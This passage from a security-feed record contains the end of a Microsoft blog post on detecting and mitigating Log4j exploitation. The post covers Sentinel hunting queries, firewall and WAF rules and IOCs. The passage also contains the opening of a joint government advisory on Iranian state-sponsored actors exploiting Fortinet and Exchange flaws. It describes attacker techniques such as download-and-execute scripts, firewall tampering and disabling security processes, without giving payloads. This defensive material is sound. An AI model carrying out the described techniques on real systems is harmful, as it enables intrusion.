hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)\n\nThis hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.\n\n * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)\n\nThis hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.\n\n * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)\n\nThis hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.\n\n * [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)\n\nThis query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses. Attackers often perform such operations as seen recently to exploit the CVE-2021-44228 vulnerability for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.\n\n### Azure Firewall Premium \n\nCustomers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\n**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit. \n\n![Screenshot of Azure Firewall Premium](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE44228_AzurePremium-61b5833c2031c.png)\n\n_Figure 23. Azure Firewall Premium portal_\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). Customers new to Azure Firewall premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).\n\n### Azure Web Application Firewall (WAF)\n\nIn response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1 available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 available for Azure Application Gateway V2 regional deployments.\n\nTo help detect and mitigate the Log2Shell vulnerability by inspecting requests\u2019 headers, URI, and body, we have released the following:\n\n * For Azure Front Door deployments, we have updated the rule **944240 \u201cRemote Command Execution\u201d** under Managed Rules\n * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules\n\nThese rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.\n\n**Recommendation**: Customers are recommended to enable WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2 to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.\n\n![Screenshot of Managed rules in Azure Web Application Firewall ](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/WAF-1b-1024x432.png)\n\n_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1 _\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/WAF-2d-1024x454.png)\n\n_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_\n\nNote: The above protection is also available on Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.\n\nMore information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).\n\n## Indicators of compromise (IOCs)\n\nMicrosoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)[https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)\n\nMicrosoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.\n\n#### Revision history\n\n**_[01/19/2022] _**_New information about an unrelated vulnerability we discovered while investigating Log4j attacks_\n\n_**[01/11/2022]** New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries _\n\n_**[01/10/2022] **Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_\n\n**_[01/07/2022] _**_Added a new rule group in _Azure Web Application Firewall (WAF)_ _\n\n**_[12/27/2021] _**_New capabilities in __threat and vulnerability management__ including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._\n\n_**[12/22/2021]** Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._\n\n_**[12/21/2021]**_ _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._\n\n**_[12/17/2021] _**_New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._\n\n_**[12/16/2021] **New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._\n\n_**[12/15/2021] **Details _about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._ _\n\n_**[12/14/2021] **New insights about multiple threat actors taking advantage of this vulnerability, _including nation-state actors and access brokers linked to ransomware._ _\n\nThe post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:29:03", "type": "mmpc", "title": "Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-12T05:29:03", "id": "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "href": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-09-09T23:03:13", "description": "### Summary\n\n_**Actions to Take Today to Protect Against Iranian State-Sponsored Malicious Cyber Activity** \n\u2022 Immediately patch software affected by the following vulnerabilities: CVE-2021-34473, 2018-13379, 2020-12812, and 2019-5591._ \n\u2022 _Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._ \n_\u2022 Use [strong, unique passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>)._\n\n___**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.___\n\nThis joint cybersecurity advisory is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom\u2019s National Cyber Security Centre (NCSC) to highlight ongoing malicious cyber activity by an advanced persistent threat (APT) group that FBI, CISA, ACSC, and NCSC assess is associated with the government of Iran. FBI and CISA have observed this Iranian government-sponsored APT group exploit Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021 to gain initial access to systems in advance of follow-on operations, which include deploying ransomware. ACSC is also aware this APT group has used the same Microsoft Exchange vulnerability in Australia.\n\nThe Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations. FBI, CISA, ACSC, and NCSC assess the actors are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.\n\nThis advisory provides observed tactics and techniques, as well as indicators of compromise (IOCs) that FBI, CISA, ACSC, and NCSC assess are likely associated with this Iranian government-sponsored APT activity.\n\nThe FBI, CISA, ACSC, and NCSC urge critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from Iranian government-sponsored cyber actors.\n\nFor a downloadable copy of IOCs, see AA21-321A.stix.\n\nFor more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Threat Actor Activity\n\nSince at least March 2021, the FBI and CISA have observed Iranian government-sponsored APT actors leverage Microsoft Exchange and Fortinet vulnerabilities to target a broad range of victims across multiple critical infrastructure sectors in furtherance of malicious activities. Observed activity includes the following.\n\n * In March 2021, the FBI and CISA observed these Iranian government-sponsored APT actors scanning devices on ports 4443, 8443, and 10443 for Fortinet FortiOS vulnerability [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), and enumerating devices for FortiOS vulnerabilities [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>) and [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>). The Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks. **Note:** for previous FBI and CISA reporting on this activity, refer to Joint Cybersecurity Advisory: [APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/media/news/2021/210402.pdf>).\n * In May 2021, these Iranian government-sponsored APT actors exploited a Fortigate appliance to access a webserver hosting the domain for a U.S. municipal government. The actors likely created an account with the username `elie` to further enable malicious activity. **Note: **for previous FBI reporting on this activity, refer to [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Initial Access for Malicious Activity](<https://www.ic3.gov/media/news/2021/210527.pdf>).\n * In June 2021, these APT actors exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare